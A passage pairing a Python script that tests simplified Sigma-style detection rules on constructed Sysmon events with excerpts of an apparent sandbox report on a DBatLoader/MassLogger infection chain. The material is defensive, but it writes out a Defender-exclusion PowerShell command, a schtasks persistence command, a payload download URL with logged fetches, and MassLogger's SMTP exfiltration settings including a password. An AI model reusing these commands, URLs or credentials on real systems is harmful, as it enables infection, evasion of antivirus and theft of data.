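SigmaHQ's code; matching logic is simplified relative to the real rules.
"""
import re

# Constructed telemetry. Entries 0-3 mirror the events quoted in the report's
# System Summary; entry 4 is a benign control (assumption) that must not fire.
EVENTS = [
    {"EventID": 11, "Image": r"C:\Users\user\AppData\Local\Temp\x.exe",
     "TargetFilename": "C:\\Windows \\SysWOW64\\NETUTILS.dll"},
    {"EventID": 13, "Image": r"C:\Users\user\AppData\Local\Temp\x.exe",
     "TargetObject": r"HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Oupzhkpr",
     "Details": r"C:\Users\Public\Oupzhkpr.url"},
    {"EventID": 1, "Image": r"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": "\"powershell.exe\" Add-MpPreference -ExclusionPath "
                    "'C:\\Users\\user\\AppData\\Roaming\\ACCApi'"},
    {"EventID": 1, "Image": r"C:\Windows\SysWOW64\schtasks.exe",
     "CommandLine": r'"schtasks.exe" /create /tn AccSys /tr "C:\Users\user\AppData\Roaming\ACCApi\apihost.exe" /st 13:14 /du 23:59 /sc daily /ri 1 /f'},
    {"EventID": 11, "Image": r"C:\Windows\System32\svchost.exe",
     "TargetFilename": r"C:\Windows\SysWOW64\NETUTILS.dll"},
]


def _s(ev: dict, key: str) -> str:
    """Field accessor that tolerates missing keys (Sysmon omits some)."""
    return str(ev.get(key, ""))


def dll_hijack_space_in_path(ev: dict) -> bool:
    """File created under "<drive>:\\Windows \\..." with a trailing space in
    the directory name. That directory is user-creatable, so a DLL or a
    look-alike svchost.exe written there is the setup the report flags."""
    return (ev.get("EventID") == 11
            and re.match(r"(?i)^[a-z]:\\windows \\", _s(ev, "TargetFilename")) is not None)


def run_key_to_suspicious_folder(ev: dict) -> bool:
    """Run value whose data points into Public, AppData or a Temp folder."""
    return (ev.get("EventID") == 13
            and "\\currentversion\\run\\" in _s(ev, "TargetObject").lower()
            and re.search(r"\\users\\public\\|\\appdata\\|\\temp\\",
                          _s(ev, "Details").lower()) is not None)


def powershell_defender_exclusion(ev: dict) -> bool:
    """Add-MpPreference combined with any -Exclusion* parameter."""
    cl = _s(ev, "CommandLine").lower()
    return ev.get("EventID") == 1 and "add-mppreference" in cl and "-exclusion" in cl


def schtasks_from_env_var_folder(ev: dict) -> bool:
    """schtasks /create whose command line references a per-user or Public
    path (what the %AppData%/%Public%-style checks in the Sigma rule expand to)."""
    cl = _s(ev, "CommandLine").lower()
    return (ev.get("EventID") == 1
            and _s(ev, "Image").lower().endswith("\\schtasks.exe")
            and "/create" in cl
            and re.search(r"\\appdata\\(roaming|local)\\|\\users\\public\\", cl) is not None)


# Titles are paraphrased from the report's "Sigma detected" list (assumption).
RULES = [
    ("DLL search order hijack via additional space in path", dll_hijack_space_in_path),
    ("New Run key pointing to suspicious folder", run_key_to_suspicious_folder),
    ("PowerShell Defender exclusion", powershell_defender_exclusion),
    ("schtasks from env-var folder", schtasks_from_env_var_folder),
]


def run_rules(events: list) -> list:
    """Return (event index, rule title) for every rule that fires."""
    return [(i, title) for i, ev in enumerate(events)
            for title, pred in RULES if pred(ev)]


if __name__ == "__main__":
    for idx, title in run_rules(EVENTS):
        print(f"event {idx}: {title}")
```

The control event writes the same DLL name to the real `C:\Windows\SysWOW64` and does not fire: the space in the path is the whole signal, which is why the real rule keys on the directory string rather than on the file name.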
Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2025-01-09T19:09:49.222732+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.6 | 49813 | 41.185.8.252 | 443 | TCP
2025-01-09T19:09:58.095403+0100 | 2803274 | 2 | Potentially Bad Traffic | 192.168.2.6 | 49860 | 158.101.44.242 | 80 | TCP


AV Detection

Source: https://lwaziacademy.com/wps/200_Oupzhkprnvw; Avira URL Cloud: Label: malware
Source: https://lwaziacademy.com:443/wps/200_Oupzhkprnvw; Avira URL Cloud: Label: malware
Source: C:\Users\Public\Libraries\Oupzhkpr.PIF; Avira: detection malicious, Label: HEUR/AGEN.1326019
Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe; Avira: detection malicious, Label: TR/Dropper.Gen
Source: C:\Users\user\AppData\Roaming\ACCApi\apihost.exe; Avira: detection malicious, Label: TR/Dropper.Gen
Source: C:\Users\user\AppData\Local\Temp\x.exe; Avira: detection malicious, Label: HEUR/AGEN.1326019
Source: C:\Users\user\AppData\Local\Temp\Microsofts.exe; Avira: detection malicious, Label: TR/ATRAPS.Gen
Source: 13.0.Microsofts.exe.350000.0.unpack; Malware Configuration Extractor: MassLogger {"EXfil Mode": "SMTP", "From": "server1@massmaesure.com", "Password": "london@1759", "Server": "lax029.hawkhost.com", "To": "server2@massmaesure.com", "Port": 587}
Source: Oupzhkpr.PIF.6.dr; Malware Configuration Extractor: DBatLoader {"Download Url": ["https://lwaziacademy.com/wps/200_Oupzhkprnvw"]}
Source: C:\Users\Public\Libraries\Oupzhkpr.PIF; ReversingLabs: Detection: 47%
Source: C:\Users\user\AppData\Local\Temp\Microsofts.exe; ReversingLabs: Detection: 91%
Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe; ReversingLabs: Detection: 79%
Source: C:\Users\user\AppData\Local\Temp\x.exe; ReversingLabs: Detection: 47%
Source: PO#3_RKG367.bat; ReversingLabs: Detection: 23%
Source: Submitted Sample; Integrated Neural Analysis Model: Matched 99.9% probability
Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe; Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\Microsofts.exe; Joe Sandbox ML: detected

Location Tracking

Source: unknown; DNS query: name: reallyfreegeoip.org

Compliance

Source: C:\Users\Public\Libraries\rpkhzpuO.pif; Unpacked PE file: 24.2.rpkhzpuO.pif.400000.0.unpack
Source: C:\Users\Public\Libraries\rpkhzpuO.pif; Unpacked PE file: 29.2.rpkhzpuO.pif.400000.0.unpack
Source: unknown; HTTPS traffic detected: 104.21.80.1:443 -> 192.168.2.6:49866 version: TLS 1.0
Source: unknown; HTTPS traffic detected: 41.185.8.252:443 -> 192.168.2.6:49813 version: TLS 1.2
                      Source: Binary string: E:\Adlice\Truesight\x64\Release\truesight.pdb source: x.exe, 00000006.00000003.2437514214.0000000021B11000.00000004.00000020.00020000.00000000.sdmp, x.exe, 00000006.00000003.2436310186.000000007ECB9000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000006.00000002.2528347556.0000000021CA6000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000006.00000003.2437514214.0000000021B6E000.00000004.00000020.00020000.00000000.sdmp, x.exe, 00000006.00000002.2508181748.0000000020AC2000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000006.00000002.2533914896.000000007F209000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000006.00000003.2436310186.000000007EC63000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000006.00000003.2436773269.000000007FBF0000.00000004.00001000.00020000.00000000.sdmp, rpkhzpuO.pif, 0000000A.00000001.2446233147.0000000000B49000.00000040.00000001.00020000.00000000.sdmp, Oupzhkpr.PIF, 00000015.00000002.2652352193.0000000020A2E000.00000004.00001000.00020000.00000000.sdmp, Oupzhkpr.PIF, 00000015.00000003.2588721035.00000000007F2000.00000004.00000020.00020000.00000000.sdmp, Oupzhkpr.PIF, 00000015.00000003.2588721035.000000000084F000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: mscorlib.pdb source: rpkhzpuO.pif, 00000018.00000002.2716549443.000000002FFA9000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: easinvoker.pdb source: x.exe, 00000006.00000002.2533914896.000000007F1A0000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000006.00000002.2508181748.0000000020AC2000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000006.00000002.2508181748.0000000020A79000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000006.00000003.2436310186.000000007EC63000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000006.00000003.2436310186.000000007EC50000.00000004.00001000.00020000.00000000.sdmp, rpkhzpuO.pif, 0000000A.00000001.2446233147.0000000000AE0000.00000040.00000001.00020000.00000000.sdmp, Oupzhkpr.PIF, 00000015.00000002.2652352193.0000000020A2E000.00000004.00001000.00020000.00000000.sdmp, Oupzhkpr.PIF, 00000015.00000002.2652352193.00000000209E5000.00000004.00001000.00020000.00000000.sdmp, Oupzhkpr.PIF, 00000015.00000002.2652352193.0000000020A16000.00000004.00001000.00020000.00000000.sdmp
                      Source: Binary string: _.pdb source: rpkhzpuO.pif, 0000000A.00000003.2448553311.000000002D0DE000.00000004.00000020.00020000.00000000.sdmp, rpkhzpuO.pif, 00000018.00000002.2741756362.00000000343B0000.00000004.08000000.00040000.00000000.sdmp, rpkhzpuO.pif, 00000018.00000002.2718853988.0000000031B53000.00000004.00000020.00020000.00000000.sdmp, rpkhzpuO.pif, 00000018.00000003.2609245491.000000002FFBA000.00000004.00000020.00020000.00000000.sdmp, rpkhzpuO.pif, 00000018.00000002.2740855997.0000000032F75000.00000004.00000800.00020000.00000000.sdmp, rpkhzpuO.pif, 0000001D.00000003.2772871636.00000000234E1000.00000004.00000020.00020000.00000000.sdmp, rpkhzpuO.pif, 0000001D.00000002.2881899810.0000000026485000.00000004.00000800.00020000.00000000.sdmp, rpkhzpuO.pif, 0000001D.00000002.2869962358.00000000250F0000.00000004.08000000.00040000.00000000.sdmp, rpkhzpuO.pif, 0000001D.00000002.2869415210.0000000024E93000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: \??\C:\Windows\mscorlib.pdb source: rpkhzpuO.pif, 00000018.00000003.2636484466.000000002FFF7000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_32\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdb source: rpkhzpuO.pif, 00000018.00000002.2716549443.000000002FFDB000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: easinvoker.pdbGCTL source: x.exe, 00000006.00000003.2437138708.0000000021B12000.00000004.00000020.00020000.00000000.sdmp, x.exe, 00000006.00000002.2533914896.000000007F1A0000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000006.00000003.2437138708.0000000021B41000.00000004.00000020.00020000.00000000.sdmp, x.exe, 00000006.00000002.2508181748.0000000020AC2000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000006.00000002.2508181748.0000000020A79000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000006.00000003.2436310186.000000007EC63000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000006.00000003.2436310186.000000007EC50000.00000004.00001000.00020000.00000000.sdmp, rpkhzpuO.pif, 0000000A.00000001.2446233147.0000000000AE0000.00000040.00000001.00020000.00000000.sdmp, Oupzhkpr.PIF, 00000015.00000002.2652352193.0000000020A2E000.00000004.00001000.00020000.00000000.sdmp, Oupzhkpr.PIF, 00000015.00000002.2652352193.00000000209E5000.00000004.00001000.00020000.00000000.sdmp, Oupzhkpr.PIF, 00000015.00000003.2588114567.0000000000822000.00000004.00000020.00020000.00000000.sdmp, Oupzhkpr.PIF, 00000015.00000003.2588114567.00000000007F3000.00000004.00000020.00020000.00000000.sdmp, Oupzhkpr.PIF, 00000015.00000002.2652352193.0000000020A16000.00000004.00001000.00020000.00000000.sdmp, Oupzhkpr.PIF, 00000019.00000003.2749710698.0000000000723000.00000004.00000020.00020000.00000000.sdmp, Oupzhkpr.PIF, 00000019.00000003.2749710698.00000000006FA000.00000004.00000020.00020000.00000000.sdmp
                      Source: C:\Users\user\AppData\Local\Temp\x.exe Code function: 6_2_02C358B4 GetModuleHandleA,GetProcAddress,lstrcpynA,lstrcpynA,lstrcpynA,FindFirstFileA,FindClose,lstrlenA,lstrcpynA,lstrlenA,lstrcpynA, 6_2_02C358B4
                      Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe Code function: 4x nop then jmp 00F17394h 12_2_00F17099
                      Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe Code function: 4x nop then jmp 00F17CDCh 12_2_00F17A7A
                      Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe Code function: 4x nop then mov dword ptr [ebp-1Ch], 00000000h 12_2_00F17E58
                      Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe Code function: 4x nop then mov dword ptr [ebp-1Ch], 00000000h 12_2_00F17E4C
                      Source: C:\Users\user\AppData\Local\Temp\Microsofts.exe Code function: 4x nop then jmp 00BB9731h 13_2_00BB9480
                      Source: C:\Users\user\AppData\Local\Temp\Microsofts.exe Code function: 4x nop then jmp 00BB9E5Ah 13_2_00BB9A40
                      Source: C:\Users\user\AppData\Local\Temp\Microsofts.exe Code function: 4x nop then jmp 00BB9731h 13_2_00BB35FD
                      Source: C:\Users\user\AppData\Local\Temp\Microsofts.exe Code function: 4x nop then jmp 00BB9E5Ah 13_2_00BB9A30
                      Source: C:\Users\user\AppData\Local\Temp\Microsofts.exe Code function: 4x nop then jmp 00BB9E5Ah 13_2_00BB9D87
                      Source: C:\Users\user\AppData\Local\Temp\Microsofts.exe Code function: 4x nop then jmp 051C62B5h 13_2_051C60D8
                      Source: C:\Users\user\AppData\Local\Temp\Microsofts.exe Code function: 4x nop then jmp 051C6C3Fh 13_2_051C60D8
                      Source: C:\Users\user\AppData\Local\Temp\Microsofts.exe Code function: 4x nop then jmp 051C3840h 13_2_051C3598
                      Source: C:\Users\user\AppData\Local\Temp\Microsofts.exe Code function: 4x nop then jmp 051C18A0h 13_2_051C15F8
                      Source: C:\Users\user\AppData\Local\Temp\Microsofts.exe Code function: 4x nop then jmp 051C26E0h 13_2_051C2438
                      Source: C:\Users\user\AppData\Local\Temp\Microsofts.exe Code function: 4x nop then mov esp, ebp 13_2_051C947A
                      Source: C:\Users\user\AppData\Local\Temp\Microsofts.exe Code function: 4x nop then jmp 051C0740h 13_2_051C0498
                      Source: C:\Users\user\AppData\Local\Temp\Microsofts.exe Code function: 4x nop then jmp 051C49A0h 13_2_051C46F8
                      Source: C:\Users\user\AppData\Local\Temp\Microsofts.exe Code function: 4x nop then jmp 051C33E8h 13_2_051C3140
                      Source: C:\Users\user\AppData\Local\Temp\Microsofts.exe Code function: 4x nop then jmp 051C1448h 13_2_051C11A0
                      Source: C:\Users\user\AppData\Local\Temp\Microsofts.exe Code function: 4x nop then mov dword ptr [ebp-14h], 00000000h 13_2_051C51E8
                      Source: C:\Users\user\AppData\Local\Temp\Microsofts.exe Code function: 4x nop then jmp 051C02E8h 13_2_051C0040
                      Source: C:\Users\user\AppData\Local\Temp\Microsofts.exe Code function: 4x nop then jmp 051C4548h 13_2_051C42A0
                      Source: C:\Users\user\AppData\Local\Temp\Microsofts.exe Code function: 4x nop then jmp 051C0FF0h 13_2_051C0D48
                      Source: C:\Users\user\AppData\Local\Temp\Microsofts.exe Code function: 4x nop then jmp 051C2F90h 13_2_051C2CE8
                      Source: C:\Users\user\AppData\Local\Temp\Microsofts.exe Code function: 4x nop then jmp 051C40F0h 13_2_051C3E48
                      Source: C:\Users\user\AppData\Local\Temp\Microsofts.exe Code function: 4x nop then jmp 051C2152h 13_2_051C1EA8
                      Source: C:\Users\user\AppData\Local\Temp\Microsofts.exe Code function: 4x nop then mov dword ptr [ebp-14h], 00000000h 13_2_051C59FB
                      Source: C:\Users\user\AppData\Local\Temp\Microsofts.exe Code function: 4x nop then jmp 051C3C98h 13_2_051C39F0
                      Source: C:\Users\user\AppData\Local\Temp\Microsofts.exe Code function: 4x nop then mov dword ptr [ebp-14h], 00000000h 13_2_051C581B
                      Source: C:\Users\user\AppData\Local\Temp\Microsofts.exe Code function: 4x nop then jmp 051C2B38h 13_2_051C2890
                      Source: C:\Users\user\AppData\Local\Temp\Microsofts.exe Code function: 4x nop then jmp 051C0B98h 13_2_051C08F0
                      Source: C:\Users\user\AppData\Local\Temp\Microsofts.exe Code function: 4x nop then jmp 051C4DF8h 13_2_051C4B50
                      Source: C:\Users\user\AppData\Local\Temp\Microsofts.exe Code function: 4x nop then jmp 051C1CF8h 13_2_051C1A50
                      Source: C:\Users\user\AppData\Roaming\ACCApi\apihost.exe Code function: 4x nop then jmp 0584BCBDh 30_2_0584BA40
                      Source: C:\Users\user\AppData\Roaming\ACCApi\apihost.exe Code function: 4x nop then jmp 0584BCBDh 30_2_0584BD43

                      Networking

                      Source: Malware configuration extractor URLs: https://lwaziacademy.com/wps/200_Oupzhkprnvw
                      Source: C:\Windows\System32\cmd.exe Dropped file: b.SaveToFile p+"\x.exe",2'v
                      Source: C:\Users\user\AppData\Local\Temp\x.exe Code function: 6_2_02C4E2F8 InternetCheckConnectionA, 6_2_02C4E2F8
                      Source: global traffic HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1 Host: reallyfreegeoip.org Connection: Keep-Alive
                      Source: Joe Sandbox View IP Address: 158.101.44.242
                      Source: Joe Sandbox View ASN Name: GridhostZA
                      Source: Joe Sandbox View JA3 fingerprint: 54328bd36c14bd82ddaa0c04b25ed9ad
                      Source: Joe Sandbox View JA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1
                      Source: unknown DNS query: name: checkip.dyndns.org
                      Source: unknown DNS query: name: reallyfreegeoip.org
                      Source: Network traffic Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:49813 -> 41.185.8.252:443
                      Source: Network traffic Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.6:49860 -> 158.101.44.242:80
                      Source: global traffic HTTP traffic detected: GET /wps/200_Oupzhkprnvw HTTP/1.1 Connection: Keep-Alive Accept: */* User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) Host: lwaziacademy.com
                      Source: global traffic HTTP traffic detected: GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
                      Source: global traffic HTTP traffic detected: GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org
                      Source: unknown HTTPS traffic detected: 104.21.80.1:443 -> 192.168.2.6:49866 version: TLS 1.0
                      Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
                      Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
                      Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
                      Source: global traffic HTTP traffic detected: GET /wps/200_Oupzhkprnvw HTTP/1.1 Connection: Keep-Alive Accept: */* User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) Host: lwaziacademy.com
                      Source: global traffic HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1 Host: reallyfreegeoip.org Connection: Keep-Alive
                      Source: global traffic HTTP traffic detected: GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
                      Source: global traffic HTTP traffic detected: GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org
                      Source: global traffic DNS traffic detected: DNS query: lwaziacademy.com
                      Source: global traffic DNS traffic detected: DNS query: checkip.dyndns.org
                      Source: global traffic DNS traffic detected: DNS query: reallyfreegeoip.org
                      Source: x.exe, 00000006.00000003.2437514214.0000000021B11000.00000004.00000020.00020000.00000000.sdmp, x.exe, 00000006.00000003.2436310186.000000007ECB9000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000006.00000002.2528347556.0000000021CA6000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000006.00000003.2437514214.0000000021B6E000.00000004.00000020.00020000.00000000.sdmp, x.exe, 00000006.00000002.2508181748.0000000020AC2000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000006.00000002.2533914896.000000007F209000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000006.00000003.2436310186.000000007EC63000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000006.00000003.2436773269.000000007FBF0000.00000004.00001000.00020000.00000000.sdmp, rpkhzpuO.pif, 0000000A.00000001.2446233147.0000000000B49000.00000040.00000001.00020000.00000000.sdmp, Oupzhkpr.PIF, 00000015.00000002.2652352193.0000000020A2E000.00000004.00001000.00020000.00000000.sdmp, Oupzhkpr.PIF, 00000015.00000003.2588721035.00000000007F2000.00000004.00000020.00020000.00000000.sdmp, Oupzhkpr.PIF, 00000015.00000003.2588721035.000000000084F000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
                      Source: x.exe, 00000006.00000003.2437514214.0000000021B11000.00000004.00000020.00020000.00000000.sdmp, x.exe, 00000006.00000003.2436310186.000000007ECB9000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000006.00000002.2528347556.0000000021CA6000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000006.00000003.2437514214.0000000021B6E000.00000004.00000020.00020000.00000000.sdmp, x.exe, 00000006.00000002.2508181748.0000000020AC2000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000006.00000002.2533914896.000000007F209000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000006.00000003.2436310186.000000007EC63000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000006.00000003.2436773269.000000007FBF0000.00000004.00001000.00020000.00000000.sdmp, rpkhzpuO.pif, 0000000A.00000001.2446233147.0000000000B49000.00000040.00000001.00020000.00000000.sdmp, Oupzhkpr.PIF, 00000015.00000002.2652352193.0000000020A2E000.00000004.00001000.00020000.00000000.sdmp, Oupzhkpr.PIF, 00000015.00000003.2588721035.00000000007F2000.00000004.00000020.00020000.00000000.sdmp, Oupzhkpr.PIF, 00000015.00000003.2588721035.000000000084F000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
                      Source: x.exe, 00000006.00000003.2437514214.0000000021B11000.00000004.00000020.00020000.00000000.sdmp, x.exe, 00000006.00000003.2436310186.000000007ECB9000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000006.00000002.2528347556.0000000021CA6000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000006.00000003.2437514214.0000000021B6E000.00000004.00000020.00020000.00000000.sdmp, x.exe, 00000006.00000002.2508181748.0000000020AC2000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000006.00000002.2533914896.000000007F209000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000006.00000003.2436310186.000000007EC63000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000006.00000003.2436773269.000000007FBF0000.00000004.00001000.00020000.00000000.sdmp, rpkhzpuO.pif, 0000000A.00000001.2446233147.0000000000B49000.00000040.00000001.00020000.00000000.sdmp, Oupzhkpr.PIF, 00000015.00000002.2652352193.0000000020A2E000.00000004.00001000.00020000.00000000.sdmp, Oupzhkpr.PIF, 00000015.00000003.2588721035.00000000007F2000.00000004.00000020.00020000.00000000.sdmp, Oupzhkpr.PIF, 00000015.00000003.2588721035.000000000084F000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
                      Source: Microsofts.exe, 0000000D.00000002.4634725765.00000000026BE000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://checkip.dyndns.com
                      Source: Microsofts.exe, 0000000D.00000002.4634725765.00000000026BE000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://checkip.dyndns.comd
                      Source: Microsofts.exe, 0000000D.00000002.4634725765.0000000002641000.00000004.00000800.00020000.00000000.sdmp, Microsofts.exe, 0000000D.00000002.4634725765.00000000026BE000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://checkip.dyndns.org
                      Source: Microsofts.exe, 0000000D.00000002.4634725765.0000000002641000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://checkip.dyndns.org/
                      Source: Microsofts.exe, 0000000D.00000002.4634725765.00000000026BE000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://checkip.dyndns.org/d
                      Source: Microsofts.exe, 0000000D.00000000.2475752594.0000000000352000.00000002.00000001.01000000.0000000D.sdmp String found in binary or memory: http://checkip.dyndns.org/q
                      Source: Microsofts.exe, 0000000D.00000002.4634725765.00000000026BE000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://checkip.dyndns.orgd
                      Source: x.exe, 00000006.00000003.2437514214.0000000021B11000.00000004.00000020.00020000.00000000.sdmp, x.exe, 00000006.00000003.2436310186.000000007ECB9000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000006.00000002.2528347556.0000000021CA6000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000006.00000003.2437514214.0000000021B6E000.00000004.00000020.00020000.00000000.sdmp, x.exe, 00000006.00000002.2508181748.0000000020AC2000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000006.00000002.2533914896.000000007F209000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000006.00000003.2436310186.000000007EC63000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000006.00000003.2436773269.000000007FBF0000.00000004.00001000.00020000.00000000.sdmp, rpkhzpuO.pif, 0000000A.00000001.2446233147.0000000000B49000.00000040.00000001.00020000.00000000.sdmp, Oupzhkpr.PIF, 00000015.00000002.2652352193.0000000020A2E000.00000004.00001000.00020000.00000000.sdmp, Oupzhkpr.PIF, 00000015.00000003.2588721035.00000000007F2000.00000004.00000020.00020000.00000000.sdmp, Oupzhkpr.PIF, 00000015.00000003.2588721035.000000000084F000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl04
                      Source: x.exe, 00000006.00000003.2436310186.000000007ECB9000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000006.00000002.2528347556.0000000021CA6000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000006.00000002.2508181748.0000000020B12000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000006.00000003.2445124760.000000007EB4A000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000006.00000002.2533914896.000000007F209000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000006.00000003.2436310186.000000007EC63000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000006.00000003.2436773269.000000007FBF0000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000006.00000003.2444599490.0000000021D51000.00000004.00000020.00020000.00000000.sdmp, rpkhzpuO.pif, 0000000A.00000001.2446233147.0000000000B49000.00000040.00000001.00020000.00000000.sdmp, Oupzhkpr.PIF, 00000015.00000002.2652352193.0000000020A2E000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: http://crl.comodoca.com/COMODOCodeSigningCA2.crl0r
                      Source: x.exe, 00000006.00000003.2437514214.0000000021B11000.00000004.00000020.00020000.00000000.sdmp, x.exe, 00000006.00000003.2436310186.000000007ECB9000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000006.00000002.2528347556.0000000021CA6000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000006.00000003.2437514214.0000000021B6E000.00000004.00000020.00020000.00000000.sdmp, x.exe, 00000006.00000002.2508181748.0000000020AC2000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000006.00000002.2533914896.000000007F209000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000006.00000003.2436310186.000000007EC63000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000006.00000003.2436773269.000000007FBF0000.00000004.00001000.00020000.00000000.sdmp, rpkhzpuO.pif, 0000000A.00000001.2446233147.0000000000B49000.00000040.00000001.00020000.00000000.sdmp, Oupzhkpr.PIF, 00000015.00000002.2652352193.0000000020A2E000.00000004.00001000.00020000.00000000.sdmp, Oupzhkpr.PIF, 00000015.00000003.2588721035.00000000007F2000.00000004.00000020.00020000.00000000.sdmp, Oupzhkpr.PIF, 00000015.00000003.2588721035.000000000084F000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://crl.sectigo.com/SectigoPublicCodeSigningCAEVR36.crl0
                      Source: x.exe, 00000006.00000003.2437514214.0000000021B11000.00000004.00000020.00020000.00000000.sdmp, x.exe, 00000006.00000003.2436310186.000000007ECB9000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000006.00000002.2528347556.0000000021CA6000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000006.00000003.2437514214.0000000021B6E000.00000004.00000020.00020000.00000000.sdmp, x.exe, 00000006.00000002.2508181748.0000000020AC2000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000006.00000002.2533914896.000000007F209000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000006.00000003.2436310186.000000007EC63000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000006.00000003.2436773269.000000007FBF0000.00000004.00001000.00020000.00000000.sdmp, rpkhzpuO.pif, 0000000A.00000001.2446233147.0000000000B49000.00000040.00000001.00020000.00000000.sdmp, Oupzhkpr.PIF, 00000015.00000002.2652352193.0000000020A2E000.00000004.00001000.00020000.00000000.sdmp, Oupzhkpr.PIF, 00000015.00000003.2588721035.00000000007F2000.00000004.00000020.00020000.00000000.sdmp, Oupzhkpr.PIF, 00000015.00000003.2588721035.000000000084F000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://crl.sectigo.com/SectigoPublicCodeSigningRootR46.crl0
